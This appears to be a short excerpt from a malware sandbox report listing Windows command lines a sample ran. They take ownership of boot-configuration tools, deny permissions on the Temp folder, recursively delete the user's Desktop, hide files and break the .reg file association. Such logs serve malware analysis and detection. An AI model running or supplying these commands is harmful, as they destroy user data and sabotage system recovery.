- '%WINDIR%\syswow64\icacls.exe' <SYSTEM32>\Temp /deny Everyone:(DE,WO,AS,GW,WD,AD,WEA,DC,WA) /T /C /Q
- '%WINDIR%\syswow64\cmd.exe' /c takeown /f <SYSTEM32>\bcdboot.exe
- '%WINDIR%\syswow64\takeown.exe' /f <SYSTEM32>\bcdboot.exe
- '%WINDIR%\syswow64\cmd.exe' /c takeown /f <SYSTEM32>\bcdedit.exe
- '%WINDIR%\syswow64\takeown.exe' /f <SYSTEM32>\bcdedit.exe
- '%WINDIR%\syswow64\cmd.exe' /c takeown /f <SYSTEM32>\bootsect.exe
- '%WINDIR%\syswow64\cmd.exe' /c rd /s /q %Userprofile%\Desktop
- '%WINDIR%\syswow64\cmd.exe' /c for /r <SYSTEM32>\Temp\ %i in (*.*) do attrib +r +s +h %i
- '%WINDIR%\syswow64\cmd.exe' /c assoc .reg=